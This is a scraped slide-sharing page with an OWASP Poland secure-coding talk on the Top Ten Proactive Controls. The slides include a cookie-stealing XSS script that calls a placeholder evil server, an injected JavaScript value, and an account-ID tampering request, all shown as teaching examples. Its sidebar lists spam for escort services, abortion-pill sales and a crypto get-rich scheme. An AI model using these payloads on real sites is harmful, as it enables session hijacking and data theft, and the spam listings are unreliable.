Developer in a digital crosshair, 2022 editionDeveloper in a digital crosshair, 2022 edition
Developer in a digital crosshair, 2022 edition
 
20+ Ways To Bypass Your Macos Privacy Mechanisms
20+ Ways To Bypass Your Macos Privacy Mechanisms20+ Ways To Bypass Your Macos Privacy Mechanisms
20+ Ways To Bypass Your Macos Privacy Mechanisms
 
How secure are webinar platforms?
How secure are webinar platforms?How secure are webinar platforms?
How secure are webinar platforms?
 
20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms
 
Serverless security: attack & defense
Serverless security: attack & defense Serverless security: attack & defense
Serverless security: attack & defense
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS apps
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
 
Let's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleLet's get evil - threat modeling at scale
Let's get evil - threat modeling at scale
 
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chain
 
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standardsWeb Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
 
Budowanie i hakowanie nowoczesnych aplikacji iOS
Budowanie i hakowanie nowoczesnych aplikacji iOSBudowanie i hakowanie nowoczesnych aplikacji iOS
Budowanie i hakowanie nowoczesnych aplikacji iOS
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.
 
Building & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsBuilding & Hacking Modern iOS Apps
Building & Hacking Modern iOS Apps
 

Último

introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
VishalKumarJha10
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
VictorSzoltysek
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is inside
shinachiaurasa2
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Alberto González Trastoy
 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
ayushiqss
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 

Último (20)

introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdfintroduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdf
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is inside
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 

Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls

  • 1. Ten Commandments of Secure Coding OWASP Top Ten Proactive Controls Mateusz Olejarka OWASP Poland
  • 2. Mateusz Olejarka @molejarka • Senior IT Security Consultant @SecuRing • Ex-developer • OWASP Poland since 2011
  • 3. OWASP O = Open • Docs & tools – free – Creative Commons license – open source • Build with open collaboration in mind – Each one of you can join 3
  • 4. OWASP Poland Chapter • Since 2007 • Meetings: Kraków, Poznań, Warszawa • Free entry • Supporters:
  • 5. 4Developers 2014* questionnaire * SecuRing’s study „Praktyki wytwarzania bezpiecznego oprogramowania w polskich firmach – 2014” • 62% companies do not educate programmers on application security • >50% companies do not consider security during the design stage • 73% participants confirmed, that they fixed security related issues • only 42% confirmed, that they do security testing before production deployment
  • 6. OWASP Top10 Risk vs OWASP Top10 Proactive Controls
  • 7. Disclaimer • Do not rely your application security on Top 10 * – It is purely educational material – Each application has its own risk profile
  • 8. Thou shalt parametrize queries 1: Parametrize queries
  • 9. SQL/LDAP/XML/cmd/…-injection Easily exploitable • Simple to use tools exist Devastating impact Źródło: http://xkcd.com/327/
  • 10. Best practices #1 Prepared Statements / Parametrized Queries #2 Stored Procedures – Watch for exeptions! (eval,dynamic block, etc.) #3 Escaping – risky! String newName = request.getParameter("newName"); String id = request.getParameter("id"); PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id);
  • 11. References • Bobby Tables: A guide to preventing SQL injection • Query Parameterization Cheat Sheet • SQL Injection Prevention Cheat Sheet • OWASP Secure Coding Practices Quick Reference Guide
  • 12. 2: Thou shalt encode data 2: Encode Data
  • 13. XSS • Site defacement • Session hijacking <script>document.body.innerHTML(“Jim was here”);</script> <script> var img = new Image(); img.src="http://<some evil server>.com?” + document.cookie; </script>
  • 14. Results of missing encoding • Session hijacking • Network scanning • CSRF prevention bypass • Site defacement (browser) • … • Browser hijack – vide BeEF
  • 15.
  • 16. Cross Site Scripting But when we write output inside pure JavaScript: <script> var split='<bean:write name="transferFormId" property="trn_recipient">'; splitRecipient(split); </script> trn_recipient=';alert('xss');-- <script> var split='';alert('xss');--
  • 17. Best practices • Special character encoding has to be context aware – HTML element – HTML attribute – JavaScript – JSON – CSS / style – URL
  • 18. References • XSS (Cross Site Scripting) Prevention Cheat Sheet • Java Encoder Project • Microsoft .NET AntiXSS Library • OWASP ESAPI • Encoder Comparison Reference Project
  • 19. Thou shalt validate all inputs 3: Validate All Inputs
  • 20. Why validate anything? • Most of other vulnerabilities (np. injections, xss, …) occurs (also) from missing input validation • Validation it is like firewall – Do not protects you agains everything – …but nice to have
  • 21. Best practices • Prefer whitelist over blacklist approach, • Use strongly typed fields – One validator per one data type – Easier to integrate a WAF • Validation = first line of defence – For exaple type casting prevents injection – But not the only one!
  • 22. References • Input Validation Cheat Sheet • Apache Commons Validator • OWASP JSON Sanitizer Project • OWASP Java HTML Sanitizer Project • Google Caja
  • 23. Thou shalt implement appropriate access controls 4: Implement Appropriate Access Controls
  • 25. HTTP request GET /services/history/account/85101022350445200448009906 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) GET /services/history/account/45101022350445200448005388 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) Account id change – we get other user data
  • 26. Best practices • Server makes a final call! • Default deny • All request must go through access controll – centralized, easy to use mechanism • Access control rules (policy) should be separated from code – Not a part of it
  • 27. if (currentUser.hasRole(“administrator”)) { //pozwol } else { //zabron } If (currentUser.isPermitted(printPermission)) { //pozwol } else { //zabron }
  • 28. References • Access Control Cheat Sheet • Java Authorization Guide with Apache Shiro – Apache Shiro Authorization features • OWASP PHPRBAC Project
  • 29. Thou shalt establish identity and authentication controls 5: Establish Identity and Authentication Controls
  • 30. Example vulnerability • Authentication with locally stored key (on the machine) • Process: 1. Enter login 2. Select key file,enter key password 3. We are logged in https://...../GenerateNewKey
  • 31. Best practices • Check access control for the functions allowing to change authentication credentials • „chain of trust” rule • Watch for session at the border! • Do not limit length and characters to use in password
  • 32. References • Authentication Cheat Sheet • Password Storage Cheat Sheet • Forgot Password Cheat Sheet • Session Management Cheat Sheet
  • 33. Thou shalt protect data and privacy 6: Protect Data and Privacy
  • 34. Example (at transit) • SSL covers encryption and authentication • What verifies servers identity? – Web applications: Browser – Mobile / thick-client / embedded… application: Application • Common errors – Missing certificate validation – Brak sprawdzenia certyfikatu lub „łańcucha zaufania” – Missing exception handling
  • 35. Best practices (in transit) • TLS • For whole application • Cookies: „Secure” flag • HTTP Strict Transport Security • Strong cipher suites • Chain of trust • Certificate pinning
  • 36. References (in transit) • Transport Layer Protection Cheat Sheet • Pinning Cheat Sheet • OWASP O-Saft (SSL Audit for Testers)
  • 37. Example (at rest) • Storing password • „Own” SHA1 function public static String encrypt(byte [] in) { String out = ""; for(int i = 0; i < in.length; i++) { byte b = (byte)(in[i] ^ key[i%key.length]); out += "" + hexDigit[(b & 0xf0)>>4] + hexDigit[b & 0x0f]; } return out; }
  • 38. Best practices(at rest) • Do not reinwent the wheel! – Home-bred ciphers are evil – Own crypto is evil – Only libraries with reputation! • Strong ciphers in strong modes – ECB is evil – CBC – watch for „padding oracle” • Good RNG for IV
  • 39. References • Google KeyCzar • Cryptographic Storage Cheat Sheet • Password Storage Cheat Sheet
  • 40. Thou shalt implement logging, error handling and intrusion detection 7: Implement Logging, Error Handling and Intrusion Detection
  • 41. References • Logging Cheat Sheet • OWASP AppSensor Project
  • 42. Thou shalt leverage security features of frameworks and security libraries 8: Leverage Security Features of Frameworks and Security Libraries
  • 43. Refenences • PHP Security Cheat Sheet • .NET Security Cheat Sheet • Spring Security • Apache Shiro • OWASP Dependency Check / Track
  • 44. Thou shalt include security- specific requirements 9: Include Security-Specific Requirements
  • 45. Building requirements • Attack scenatios – How threats can reach the objectives? – Requires experience and expertise • Selection of security controls == REQUIREMENTS Threat Results Attack scenarios Who? How? What?
  • 46. References • OWASP Application Security Verification Standard Project • Software Assurance Maturity Model • Business Logic Security Cheat Sheet • Testing for business logic (OWASP-BL-001)
  • 47. Thou shalt design and architect security in 10: Design and Architect Security In
  • 48. References • Software Assurance Maturity Model (OpenSAMM) • Application Security Verification Standard Project • Application Security Architecture Cheat Sheet • Attack Surface Analysis Cheat Sheet • Threat Modeling Cheat Sheet
  • 50. That was just the Top Ten! • Each application is different – Risk profile should be defined (WHO? WHY?) – Consider „compliance with existing regulations” • Few easy steps with big positive impact • Developers education is worth it!
  • 51. OWASP meetings • https://www.owasp.org/index.php/Poland • Mailing list • Facebook: OWASP Poland Local Chapter • Twitter: @owasppoland